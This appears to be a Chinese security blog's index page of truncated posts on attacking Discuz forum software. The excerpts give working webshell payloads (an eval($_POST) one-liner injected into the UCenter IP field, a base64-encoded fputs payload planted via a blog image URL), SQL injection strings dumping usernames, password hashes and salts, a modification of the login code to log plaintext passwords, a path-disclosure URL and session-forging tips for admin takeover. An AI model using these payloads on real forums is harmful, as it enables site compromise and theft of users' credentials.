discuz X2.5后台拿shell及修复

有管理员帐号及密码。  直接在UCenter IP 地址:里面插入一句话 xxoo\');eval($_POST[a])?>;//  就ok 然后菜刀连接https://www.webshell.cc/config/config_ucenter.php密码a , 测试通过

- 阅读全文 -

DZ!2.5 后台拿 WebShell 方法!

直都没找到DZ! 2.5后台拿shell的方法 一直等大牛暴出来 这次 暴了2个。 1.注册任意账户 2.登陆用户,发表blog日志(注意是日志) 3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} 4.访问日志,论...

- 阅读全文 -

Discuz x1.5 – x2版本 二次注射

a',`subject`=(/*!select*/ concat(username,'|',password,'|',salt) from pre_ucenter_members where uid=1 limit 0,1),comment=' 再给出一些语句。 ',`subject`=(/*!select*/ group_concat(uid,':') from pre_common_membe...

- 阅读全文 -

shell下轻松截获DZ X2明文密码

首先:第一次发帖,大牛请一笑而过 其次:这是通过简单修改DZ源文件,利用密码错误记录原理截取明文密码 呵呵,目的比较简单,不想跑那蛋疼的二次加密MD5,当然不是为了做坏事 目标文件:/source/class/class_member.php   先看错误密码记录部分,第200行左右    } else {  $password = preg_replace("/^(.{".r...

- 阅读全文 -

DZ 7.2最新版爆路径0day

这里只是说下方法,在要爆DZ 7.2 bbs的网站后面加上以下代码访问,即可爆出。"manyou/admincp.php?my_suffix=%0A%0DTOBY57",引号不算。 例如:https://www.webshell.cc/manyou/admincp.php?my_suffix=%0A%0DTOBY57

- 阅读全文 -

Discuz 1.5暴WEB路径漏洞

测试环境:discuz X1.5+nginx 1.0 漏洞文件source/function/function_core.php, 代码: $_G['setting']['domain']['app']['default'] && $content = preg_replace("/<a href=\"([^\"]+)\"/e", "rewriteoutput('site_d...

- 阅读全文 -

discuz sessoin hijack tips 续

前面发的是UCHOME,为免有装B的嫌疑,干脆DISCUZ论坛的SESSION劫持方法也一并公布了。转载请保留原始URL,谢谢.   DISCUZ X系列论坛的session和UCHOME不同,生成session使用的authkey不是程序的UCKEY,看看DZ的代码就了解啦:   1.浏览器类型和$_config['security']['authkey']加起来生成了一个全...

- 阅读全文 -

discuz sessoin hijack tips

捂了N年的一个东西,今天公布了吧。 当通过DISCUZ系列程序的SQL注入漏洞,获得用户的HASH和ucenter的uckey后,其实是可以直接构造管理员的session的,然后在前台以管理员的身份做任何操作。 DISCUZ论坛验证了登录的IP和浏览器类型等,不过大家看看代码就会知道怎么绕了,而uchome弱一点,没有IP限制,我就拿uchome举例说说这个方法:   1.首先membe...

- 阅读全文 -